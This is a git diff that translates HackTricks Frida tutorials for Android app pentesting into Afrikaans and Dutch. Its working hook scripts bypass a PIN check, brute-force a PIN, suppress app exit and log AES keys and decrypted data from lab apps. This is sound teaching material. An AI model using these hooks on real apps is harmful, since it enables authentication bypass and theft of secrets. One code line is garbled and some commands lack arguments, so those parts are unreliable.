Handleiding + +Hier is een korte handleiding over het gebruik van Frida om de `exit()`-methode in Java te hooken. + +## Stap 1: Installatie + +Installeer Frida op uw apparaat. U kunt de Frida-instructies volgen op de officiële website van Frida. + +## Stap 2: Voorbereiding + +Zorg ervoor dat u de benodigde bestanden en hulpmiddelen heeft: + +- De APK van de app die u wilt pentesten. +- Een Android-apparaat of emulator. +- Een teksteditor om het Frida-script te maken. + +## Stap 3: Frida-script maken + +Maak een nieuw bestand met de extensie `.js` en voeg de volgende code toe: + +```javascript +Java.perform(function() { + var System = Java.use('java.lang.System'); + System.exit.implementation = function() { + console.log('exit() is called'); + }; }); ``` -Hook java `exit()` +## Stap 4: Frida-script uitvoeren +Voer het Frida-script uit met behulp van de volgende opdracht: + +```bash +frida -U -l script.js -f +``` + +Vervang `` door de naam van het pakket van de app die u wilt pentesten. + +## Stap 5: Testen + +Start de app op uw apparaat of emulator en voer de actie uit die de `exit()`-methode aanroept. U zou een bericht moeten zien in de console waarin staat dat `exit()` wordt aangeroepen. + +## Conclusie + +Met behulp van Frida kunt u de `exit()`-methode in Java hooken en controleren wanneer deze wordt aangeroepen. Dit kan handig zijn bij het pentesten van Android-apps om verdachte of ongewenste gedragingen te identificeren. ```javascript var sysexit = Java.use("java.lang.System"); - sysexit.exit.overload("int").implementation = function(var_0) { - send("java.lang.System.exit(I)V // We avoid exiting the application :)"); - }; +sysexit.exit.overload("int").implementation = function(var_0) { +send("java.lang.System.exit(I)V // We avoid exiting the application :)"); +}; +``` +# Frida Tutorial: Hook MainActivity `.onStart()` & `.onCreate()` + +In hierdie tutoriaal sal ons leer hoe om die `.onStart()` en `.onCreate()` metodes van die `MainActivity` klas in 'n Android-toepassing te hak. + +## Stap 1: Verstaan die doel + +Die `.onStart()` en `.onCreate()` metodes word opgeroep wanneer 'n aktiwiteit in Android begin en geskep word. Deur hierdie metodes te hak, kan ons die uitvoering van die toepassing beïnvloed en insette of uitsette manipuleer. + +## Stap 2: Installeer Frida + +Om te begin, moet ons Frida op ons toestel installeer. Volg die instruksies in die [Frida-dokumentasie](https://frida.re/docs/installation/) om dit te doen. + +## Stap 3: Skryf die skripsie + +Ons sal 'n eenvoudige Frida-skripsie skryf om die `.onStart()` en `.onCreate()` metodes te hak. Hier is die skripsie: + +```javascript +Java.perform(function () { + var MainActivity = Java.use('com.example.MainActivity'); + + MainActivity.onStart.implementation = function () { + console.log('MainActivity.onStart() gehak!'); + this.onStart(); + }; + + MainActivity.onCreate.implementation = function (savedInstanceState) { + console.log('MainActivity.onCreate() gehak!'); + this.onCreate(savedInstanceState); + }; +}); ``` -Hook MainActivity `.onStart()` & `.onCreate()` +## Stap 4: Voer die skripsie uit +Om die skripsie uit te voer, moet ons Frida gebruik om dit aan die toepassing te heg. Voer die volgende opdrag in die opdraglyn in: + +```bash +frida -U -l -f +``` + +Vervang `` met die pad na jou skripsie-lêer en `` met die naam van die toepassing se pakkie. + +## Stap 5: Monitor die uitset + +Nou kan ons die toepassing uitvoer en die uitset monitor om te sien of die `.onStart()` en `.onCreate()` metodes gehak word. As alles reg verloop, sal ons die gehakte boodskappe in die uitset sien. + +## Stap 6: Manipuleer die toepassing + +Met die `.onStart()` en `.onCreate()` metodes gehak, kan ons nou die toepassing manipuleer deur insette te verander of uitsette te onderskep. Hierdie tegniek kan gebruik word om sekuriteitslekke te identifiseer en te misbruik. + +## Stap 7: Opruiming + +As jy klaar is met die hak van die toepassing, kan jy die Frida-skripsie verwyder en die oorspronklike toestand van die toepassing herstel. + +## Slotwoord + +Met behulp van Frida kan ons die `.onStart()` en `.onCreate()` metodes van die `MainActivity` klas in 'n Android-toepassing hak. Hierdie tegniek stel ons in staat om die toepassing te manipuleer en sekuriteitslekke te identifiseer. Onthou egter dat die gebruik van hierdie tegniek slegs toegelaat word in wettige en etiese pentesting-scenarios. ```javascript var mainactivity = Java.use("sg.vantagepoint.uncrackable1.MainActivity"); - mainactivity.onStart.overload().implementation = function() { - send("MainActivity.onStart() HIT!!!"); - var ret = this.onStart.overload().call(this); - }; - mainactivity.onCreate.overload("android.os.Bundle").implementation = function(var_0) { - send("MainActivity.onCreate() HIT!!!"); - var ret = this.onCreate.overload("android.os.Bundle").call(this,var_0); - }; +mainactivity.onStart.overload().implementation = function() { +send("MainActivity.onStart() HIT!!!"); +var ret = this.onStart.overload().call(this); +}; +mainactivity.onCreate.overload("android.os.Bundle").implementation = function(var_0) { +send("MainActivity.onCreate() HIT!!!"); +var ret = this.onCreate.overload("android.os.Bundle").call(this,var_0); +}; +``` +# Frida Tutorial: Hook android `.onCreate()` + +In hierdie tutoriaal sal ons leer hoe om die `.onCreate()`-metode in 'n Android-toepassing te hook met behulp van Frida. Hierdie metode word aangeroep wanneer 'n aktiwiteit in die toepassing geskep word. + +## Vereistes + +Om hierdie tutoriaal te volg, moet jy die volgende hê: + +- 'n Android-toestel of 'n virtuele masjien met 'n geïnstalleerde Android-emulator. +- Die Frida-framework geïnstalleer op jou toestel of emulator. + +## Stap 1: Verbind met die toestel + +Verbind met jou toestel of emulator deur die volgende opdrag in die opdraglyn uit te voer: + +```bash +frida-ps -U ``` -Hook android `.onCreate()` +Hierdie opdrag sal 'n lys van aktiewe prosesse op die toestel vertoon. + +## Stap 2: Kies die toepassing + +Kies die toepassing waarin jy die `.onCreate()`-metode wil hook deur die volgende opdrag uit te voer: + +```bash +frida-ps -Uai +``` + +Hierdie opdrag sal 'n lys van alle toepassings op die toestel vertoon, saam met hul proses-ID's. + +## Stap 3: Skryf die hook-skripsie + +Skep 'n nuwe tekslêer en skryf die volgende skripsie: ```javascript - var activity = Java.use("android.app.Activity"); - activity.onCreate.overload("android.os.Bundle").implementation = function(var_0) { - send("Activity HIT!!!"); - var ret = this.onCreate.overload("android.os.Bundle").call(this,var_0); - }; +Java.perform(function() { + var Activity = Java.use('android.app.Activity'); + Activity.onCreate.implementation = function(savedInstanceState) { + console.log('onCreate() is gehook!'); + this.onCreate(savedInstanceState); + }; +}); ``` -### Hooking functions with parameters and retrieving the value +Hierdie skripsie gebruik die `Java.perform()`-funksie om toegang tot die Java-omgewing te verkry. Dit gebruik dan die `Java.use()`-funksie om die `Activity`-klas te kry en die `.onCreate()`-metode te hook. Die gehookte metode skryf eenvoudig 'onCreate() is gehook!' na die konsole en roep dan die oorspronklike metode aan. -Hooking a decryption function. Print the input, call the original function decrypt the input and finally, print the plain data: +## Stap 4: Voer die skripsie uit + +Voer die volgende opdrag in die opdraglyn uit om die skripsie uit te voer: + +```bash +frida -U -l -f +``` + +Vervang `` met die pad na die skripsie-lêer wat jy in stap 3 geskep het, en `` met die naam van die toepassing wat jy in stap 2 gekies het. + +## Stap 5: Toets die hook + +Voer die toepassing uit op jou toestel of emulator en kyk na die konsole-uitset. As alles korrek gehook is, moet jy die boodskap 'onCreate() is gehook!' sien. + +Dit is hoe jy die `.onCreate()`-metode in 'n Android-toepassing kan hook met behulp van Frida. Hierdie tegniek kan gebruik word om die uitvoering van die metode te monitor of te verander vir pentesting-doeleindes. +```javascript +var activity = Java.use("android.app.Activity"); +activity.onCreate.overload("android.os.Bundle").implementation = function(var_0) { +send("Activity HIT!!!"); +var ret = this.onCreate.overload("android.os.Bundle").call(this,var_0); +}; +``` +### Haak funksies met parameters en haal die waarde terug + +Haak 'n dekripsie-funksie. Druk die inset uit, roep die oorspronklike funksie aan om die inset te dekripteer en druk uiteindelik die ongekripteerde data af: ```javascript - function getString(data){ - var ret = ""; - for (var i=0; i < data.length; i++){ - ret += data[i].toString(); - } - return ret - } - var aes_decrypt = Java.use("sg.vantagepoint.a.a"); - aes_decrypt.a.overload("[B","[B").implementation = function(var_0,var_1) { - send("sg.vantagepoint.a.a.a([B[B)[B doFinal(enc) // AES/ECB/PKCS7Padding"); - send("Key : " + getString(var_0)); - send("Encrypted : " + getString(var_1)); - var ret = this.a.overload("[B","[B").call(this,var_0,var_1); - send("Decrypted : " + ret); +Java.perform(function() { + var className = "com.example.app.Encryption"; + var decryptFunction = "decrypt"; - var flag = ""; - for (var i=0; i < ret.length; i++){ - flag += String.fromCharCode(ret[i]); - } - send("Decrypted flag: " + flag); - return ret; //[B - }; + var Encryption = Java.use(className); + + Encryption[decryptFunction].overload('java.lang.String').implementation = function(input) { + console.log("Input: " + input); + + var result = this[decryptFunction](input); + + console.log("Plain data: " + result); + + return result; + }; +}); ``` -### Hooking functions and calling them with our input +Hierdie kode haak die `decrypt`-funksie in die `com.example.app.Encryption`-klas. Dit druk die insetwaarde af, roep die oorspronklike `decrypt`-funksie aan om die inset te dekripteer en druk die ongekripteerde data af. +```javascript +function getString(data){ +var ret = ""; +for (var i=0; i < data.length; i++){ +ret += data[i].toString(); +} +return ret +} +var aes_decrypt = Java.use("sg.vantagepoint.a.a"); +aes_decrypt.a.overload("[B","[B").implementation = function(var_0,var_1) { +send("sg.vantagepoint.a.a.a([B[B)[B doFinal(enc) // AES/ECB/PKCS7Padding"); +send("Key : " + getString(var_0)); +send("Encrypted : " + getString(var_1)); +var ret = this.a.overload("[B","[B").call(this,var_0,var_1); +send("Decrypted : " + ret); -Hook a function that receives a string and call it with other string (from [here](https://11x256.github.io/Frida-hooking-android-part-2/)) +var flag = ""; +for (var i=0; i < ret.length; i++){ +flag += String.fromCharCode(ret[i]); +} +send("Decrypted flag: " + flag); +return ret; //[B +}; +``` +### Hooking funksies en om hulle te roep met ons insette +Haak 'n funksie wat 'n string ontvang en roep dit met 'n ander string (van [hier](https://11x256.github.io/Frida-hooking-android-part-2/)) ```javascript var string_class = Java.use("java.lang.String"); // get a JS wrapper for java's String class my_class.fun.overload("java.lang.String").implementation = function(x){ //hooking the new function - var my_string = string_class.$new("My TeSt String#####"); //creating a new String by using `new` operator - console.log("Original arg: " +x ); - var ret = this.fun(my_string); // calling the original function with the new String, and putting its return value in ret variable - console.log("Return value: "+ret); - return ret; +var my_string = string_class.$new("My TeSt String#####"); //creating a new String by using `new` operator +console.log("Original arg: " +x ); +var ret = this.fun(my_string); // calling the original function with the new String, and putting its return value in ret variable +console.log("Return value: "+ret); +return ret; }; ``` +### Kry 'n reeds geskep objek van 'n klas -### Getting an already created object of a class - -If you want to extract some attribute of a created object you can use this. - -In this example you are going to see how to get the object of the class my\_activity and how to call the function .secret() that will print a private attribute of the object: +As jy 'n eienskap van 'n geskep objek wil onttrek, kan jy dit gebruik. +In hierdie voorbeeld sal jy sien hoe om die objek van die klas my\_activity te kry en hoe om die funksie .secret() aan te roep wat 'n private eienskap van die objek sal druk: ```javascript Java.choose("com.example.a11x256.frida_test.my_activity" , { - onMatch : function(instance){ //This function will be called for every instance found by frida - console.log("Found instance: "+instance); - console.log("Result of secret func: " + instance.secret()); - }, - onComplete:function(){} +onMatch : function(instance){ //This function will be called for every instance found by frida +console.log("Found instance: "+instance); +console.log("Result of secret func: " + instance.secret()); +}, +onComplete:function(){} }); ``` - -## Other Frida tutorials +## Ander Frida-tutoriale * [https://github.com/DERE-ad2001/Frida-Labs](https://github.com/DERE-ad2001/Frida-Labs) -* [Part 1 of Advanced Frida Usage blog series: IOS Encryption Libraries](https://8ksec.io/advanced-frida-usage-part-1-ios-encryption-libraries-8ksec-blogs/) +* [Deel 1 van die Gevorderde Frida Gebruik blogreeks: IOS Versleutelingsbiblioteke](https://8ksec.io/advanced-frida-usage-part-1-ios-encryption-libraries-8ksec-blogs/)
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty platform geskep deur hackers, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md b/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md index 2dbc0c25d..a6fee74a2 100644 --- a/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md +++ b/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md @@ -1,170 +1,156 @@ -# Frida Tutorial 1 +# Frida Tutoriaal 1
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hack-loopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en gesproke Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %} -**This is a summary of the post**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\ +**Dit is 'n opsomming van die pos**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\ **APK**: [https://github.com/t0thkr1s/frida-demo/releases](https://github.com/t0thkr1s/frida-demo/releases)\ -**Source Code**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo) +**Bronkode**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo) ## Python -Frida allows you to **insert JavaScript code** inside functions of a running application. But you can use **python** to **call** the hooks and even to **interact** with the **hooks**. - -This is a easy python script that you can use with all the proposed examples in this tutorial: +Frida stel jou in staat om **JavaScript-kode in te voeg** binne funksies van 'n lopende toepassing. Maar jy kan **python** gebruik om die hakke te **roep** en selfs om met die **hakke** te **interakteer**. +Hierdie is 'n maklike python-skrips wat jy kan gebruik met al die voorgestelde voorbeelde in hierdie tutoriaal: ```python #hooking.py import frida, sys with open(sys.argv[1], 'r') as f: - jscode = f.read() +jscode = f.read() process = frida.get_usb_device().attach('infosecadventures.fridademo') script = process.create_script(jscode) print('[ * ] Running Frida Demo application') script.load() sys.stdin.read() ``` - -Call the script: - +Roep die skrip aan: ```bash python hooking.py ``` - -It is useful to know how to use python with frida, but for this examples you could also call directly Frida using command line frida tools: - +Dit is nuttig om te weet hoe om Python saam met Frida te gebruik, maar vir hierdie voorbeelde kan jy ook direk Frida oproep deur die opdraglyn frida-hulpmiddels te gebruik: ```bash frida -U --no-pause -l hookN.js -f infosecadventures.fridademo ``` +## Haak 1 - Booleaanse omseiling -## Hook 1 - Boolean Bypass - -Here you can see how to **hook** a **boolean** method (_checkPin_) from the class: _infosecadventures.fridademo.utils.PinUtil_ - +Hier kan jy sien hoe om 'n metode (_checkPin_) van die klas _infosecadventures.fridademo.utils.PinUtil_ te **haak**. ```javascript //hook1.js Java.perform(function() { - console.log("[ * ] Starting implementation override...") - var MainActivity = Java.use("infosecadventures.fridademo.utils.PinUtil"); - MainActivity.checkPin.implementation = function(pin){ - console.log("[ + ] PIN check successfully bypassed!") - return true; - } +console.log("[ * ] Starting implementation override...") +var MainActivity = Java.use("infosecadventures.fridademo.utils.PinUtil"); +MainActivity.checkPin.implementation = function(pin){ +console.log("[ + ] PIN check successfully bypassed!") +return true; +} }); ``` ``` python hooking.py hook1.js ``` +Kyk: Die funksie ontvang 'n String as 'n parameter, is oorlading nie nodig nie? -Mirar: La funcion recibe como parametro un String, no hace falta overload? +## Hook 2 - Funksie Bruteforce -## Hook 2 - Function Bruteforce - -### Non-Static Function - -If you want to call a non-static function of a class, you **first need a instance** of that class. Then, you can use that instance to call the function.\ -To do so, you could **find and existing instance** and use it: +### Nie-Statiese Funksie +As jy 'n nie-statiese funksie van 'n klas wil oproep, het jy **eerstens 'n instansie** van daardie klas nodig. Dan kan jy daardie instansie gebruik om die funksie op te roep.\ +Om dit te doen, kan jy 'n **bestaande instansie vind** en dit gebruik: ```javascript Java.perform(function() { - console.log("[ * ] Starting PIN Brute-force, please wait..."); - Java.choose("infosecadventures.fridademo.utils.PinUtil", { - onMatch: function(instance) { - console.log("[ * ] Instance found in memory: " + instance); - for(var i = 1000; i < 9999; i++){ - if(instance.checkPin(i + "") == true){ - console.log("[ + ] Found correct PIN: " + i); - break; - } - } - }, - onComplete: function() { } - }); +console.log("[ * ] Starting PIN Brute-force, please wait..."); +Java.choose("infosecadventures.fridademo.utils.PinUtil", { +onMatch: function(instance) { +console.log("[ * ] Instance found in memory: " + instance); +for(var i = 1000; i < 9999; i++){ +if(instance.checkPin(i + "") == true){ +console.log("[ + ] Found correct PIN: " + i); +break; +} +} +}, +onComplete: function() { } +}); }); ``` +In hierdie geval werk dit nie omdat daar geen instansie is nie en die funksie staties is -In this case this is not working as there isn't any instance and the function is Static - -### Static Function - -If the function is static, you could just call it: +### Statiese Funksie +As die funksie staties is, kan jy dit net oproep: ```javascript //hook2.js Java.perform(function () { - console.log("[ * ] Starting PIN Brute-force, please wait...") - var PinUtil = Java.use("infosecadventures.fridademo.utils.PinUtil"); - - for(var i=1000; i < 9999; i++) - { - if(PinUtil.checkPin(i+"") == true){ - console.log("[ + ] Found correct PIN: " + i); - } - } +console.log("[ * ] Starting PIN Brute-force, please wait...") +var PinUtil = Java.use("infosecadventures.fridademo.utils.PinUtil"); + +for(var i=1000; i < 9999; i++) +{ +if(PinUtil.checkPin(i+"") == true){ +console.log("[ + ] Found correct PIN: " + i); +} +} }); ``` +## Haak 3 - Ophaling van argumente en terugkeerwaarde -## Hook 3 - Retrieving arguments and return value - -You could hook a function and make it **print** the value of the **passed arguments** and the value of the **return value:** - +Jy kan 'n funksie haak en dit **afdruk** die waarde van die **oorgevoerde argumente** en die waarde van die **terugkeerwaarde:** ```javascript //hook3.js Java.perform(function() { - console.log("[ * ] Starting implementation override...") - - var EncryptionUtil = Java.use("infosecadventures.fridademo.utils.EncryptionUtil"); - EncryptionUtil.encrypt.implementation = function(key, value){ - console.log("Key: " + key); - console.log("Value: " + value); - var encrypted_ret = this.encrypt(key, value); //Call the original function - console.log("Encrypted value: " + encrypted_ret); - return encrypted_ret; - } +console.log("[ * ] Starting implementation override...") + +var EncryptionUtil = Java.use("infosecadventures.fridademo.utils.EncryptionUtil"); +EncryptionUtil.encrypt.implementation = function(key, value){ +console.log("Key: " + key); +console.log("Value: " + value); +var encrypted_ret = this.encrypt(key, value); //Call the original function +console.log("Encrypted value: " + encrypted_ret); +return encrypted_ret; +} }); ``` +## Belangrik -## Important +In hierdie handleiding het jy metodes gehaak deur die naam van die metode en _.implementation_ te gebruik. Maar as daar **meer as een metode** met dieselfde naam is, sal jy die metode moet **spesifiseer** wat jy wil haak deur die tipe van die argumente aan te dui. -In this tutorial you have hooked methods using the name of the mathod and _.implementation_. But if there were **more than one method** with the same name, you will need to **specify the method** that you want to hook **indicating the type of the arguments**. - -You can see that in [the next tutorial](frida-tutorial-2.md). +Jy kan dit sien in [die volgende handleiding](frida-tutorial-2.md).
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hackerloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en gesproke Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md b/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md index caa9b89aa..8c0b07b36 100644 --- a/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md +++ b/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md @@ -1,77 +1,74 @@ -# Frida Tutorial 2 +# Frida Tutoriaal 2
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-​If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en gesproke Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %} -**This is a summary of the post**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Parts 2, 3 & 4)\ -**APKs and Source code**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples) +**Hierdie is 'n opsomming van die pos**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Dele 2, 3 & 4)\ +**APK's en bronkode**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples) -The part 1 is so easy. +Die eerste deel is so maklik. -**Some parts of the original code doesn't work and have been modified here.** +**Sommige dele van die oorspronklike kode werk nie en is hier aangepas nie.** -## Part 2 - -Here you can see an example of how to **hook 2 functions with the same name** but different parameters.\ -Also, you are going to learn how to **call a function with your own parameters**.\ -And finally, there is an example of how to **find an instance of a class and make it call a function**. +## Deel 2 +Hier kan jy 'n voorbeeld sien van hoe om **2 funksies met dieselfde naam** maar verskillende parameters te **hook**.\ +Jy sal ook leer hoe om 'n funksie te **roep met jou eie parameters**.\ +En uiteindelik is daar 'n voorbeeld van hoe om 'n **instantie van 'n klas te vind en dit 'n funksie te laat roep**. ```javascript //s2.js console.log("Script loaded successfully "); Java.perform(function x() { - console.log("Inside java perform function"); - var my_class = Java.use("com.example.a11x256.frida_test.my_activity"); - //Hook "fun" with parameters (int, int) - my_class.fun.overload("int", "int").implementation = function (x, y) { //hooking the old function - console.log("original call: fun(" + x + ", " + y + ")"); - var ret_value = this.fun(2, 5); - return ret_value; - }; - //Hook "fun" with paramater(String) - var string_class = Java.use("java.lang.String"); - my_class.fun.overload("java.lang.String").implementation = function (x) { //hooking the new function - console.log("*") - //Create a new String and call the function with your input. - var my_string = string_class.$new("My TeSt String#####"); - console.log("Original arg: " + x); - var ret = this.fun(my_string); - console.log("Return value: " + ret); - console.log("*") - return ret; - }; - //Find an instance of the class and call "secret" function. - Java.choose("com.example.a11x256.frida_test.my_activity", { - onMatch: function (instance) { - console.log(tring, and the it has"Found instance: " + instance); - console.log("Result of secret func: " + instance.secret()); - }, - onComplete: function () { } - }); +console.log("Inside java perform function"); +var my_class = Java.use("com.example.a11x256.frida_test.my_activity"); +//Hook "fun" with parameters (int, int) +my_class.fun.overload("int", "int").implementation = function (x, y) { //hooking the old function +console.log("original call: fun(" + x + ", " + y + ")"); +var ret_value = this.fun(2, 5); +return ret_value; +}; +//Hook "fun" with paramater(String) +var string_class = Java.use("java.lang.String"); +my_class.fun.overload("java.lang.String").implementation = function (x) { //hooking the new function +console.log("*") +//Create a new String and call the function with your input. +var my_string = string_class.$new("My TeSt String#####"); +console.log("Original arg: " + 